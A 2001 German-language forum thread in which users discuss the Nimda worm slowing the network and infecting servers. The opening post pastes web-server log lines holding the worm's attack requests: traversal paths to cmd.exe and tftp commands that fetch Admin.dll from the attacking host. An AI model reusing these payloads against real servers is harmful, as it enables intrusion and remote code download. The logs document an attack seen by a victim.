Citrix verursacht WLAN Netzwerkprobleme
22:40 Garrett
22:40 Garrett
F***king Nimba
Forum Index > Software > Windows
The Red Guy 19.09.2001 - 14:19 2205 43
Posts
The Red Guy
Untitled
Registered: Jul 2001
Location: Transdanubia Posts: 3121 |
Der Virus hat sich ja wieder toll im Chello-Netz verbreitet.
Die Logfiles vom Firmenwebserver gehen schon über mit solchen requests: 2001-09-19 00:03:58 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/root.exe /c+dir 404 HTTP/1.0 www - 2001-09-19 00:03:58 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /MSADC/root.exe /c+dir 403 HTTP/1.0 www - 2001-09-19 00:03:58 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 HTTP/1.0 www - 2001-09-19 00:03:59 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 HTTP/1.0 www - 2001-09-19 00:04:00 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 HTTP/1.0 www - 2001-09-19 00:04:03 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20212.17.35.8%20GET%20Admin.dll%20c:\Admin.dll 502 HTTP/1.0 www - 2001-09-19 00:04:03 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20212.17.35.8%20GET%20Admin.dll%20d:\Admin.dll 502 HTTP/1.0 www - 2001-09-19 00:04:06 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20212.17.35.8%20GET%20Admin.dll%20e:\Admin.dll 502 HTTP/1.0 www - 2001-09-19 00:04:06 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /scripts/..%5c../Admin.dll - 500 HTTP/1.0 www - 2001-09-19 00:04:06 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 HTTP/1.0 www - 2001-09-19 00:04:06 212.17.35.8 - W3SVC1 DEFIANT 100.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20212.17.35.8%20GET%20Admin.dll%20c:\Admin.dll 502 HTTP/1.0 www - Macht schon nimma Spass.  Surfen ist heute ein einziges Warten. Alles wie tot. Langsam sollte man sich echt was wegen den selbstreplizierenden Viren überlegen. |
noledge
CWNE #540
Registered: Apr 2001
Location: ::1 Posts: 6838 |
|
Redphex
Legend
RabbitOfNegativeEuphoria
Registered: Mar 2000
Location: Macrodata Refine.. Posts: 11815 |
|
HaBa
Vereinsmitglied
Dr. Funkenstein 
Registered: Mar 2001
Location: St. Speidl / Gle.. Posts: 19769 |
|
noledge
CWNE #540
Registered: Apr 2001
Location: ::1 Posts: 6838 |
is blöde is das de angriffe nix gleiches in der url haben, da kammas ned gscheid zählen
noledge |
Ctrl-Alt-Del
Freund der 4 Ringe!
Registered: Feb 2001
Location: Ländle Posts: 3058 |
In wie weit müsste ich das Teil bemerken?
Bei uns in der Firma ist nix los... kein Virus/Wurm weit und breit. Hmmm langweilig! 
|
The Red Guy
Untitled
Registered: Jul 2001
Location: Transdanubia Posts: 3121 |
|
The Red Guy
Untitled
Registered: Jul 2001
Location: Transdanubia Posts: 3121 |
In den Root-Verzeichnissen deiner Partitions befindet sich auf einmal die admin.dll. du hast extrem hohen traffic im netz. Mails werden verschickt mit diversen Files. Du hast plötzlich neue shares auf deinen Rechnern... Genaue info gibts hier bei McAfee. |
HaBa
Vereinsmitglied
Dr. Funkenstein
Registered: Mar 2001
Location: St. Speidl / Gle.. Posts: 19769 |
Bearbeitet von HaBa am 19.09.2001, 15:06 |
Ctrl-Alt-Del
Freund der 4 Ringe!
Registered: Feb 2001
Location: Ländle Posts: 3058 |
Danke! Klingt nett!
|
noledge
CWNE #540
Registered: Apr 2001
Location: ::1 Posts: 6838 |
|
noledge
CWNE #540
Registered: Apr 2001
Location: ::1 Posts: 6838 |
|
BeatMaster
Mountainbiker
Registered: Feb 2001
Location: 2301 Posts: 777 |
|
The Red Guy
Untitled
Registered: Jul 2001
Location: Transdanubia Posts: 3121 |
|
spunz
Elder
Elder 
Registered: Aug 2000
Location: achse des bösen Posts: 11291 |
tjo, alle dau´s haben wieder was gelernt. ie sux
 iis sux outlook sux
|
Anmeldung
New Posts
Latest News
Links
L E F T B A R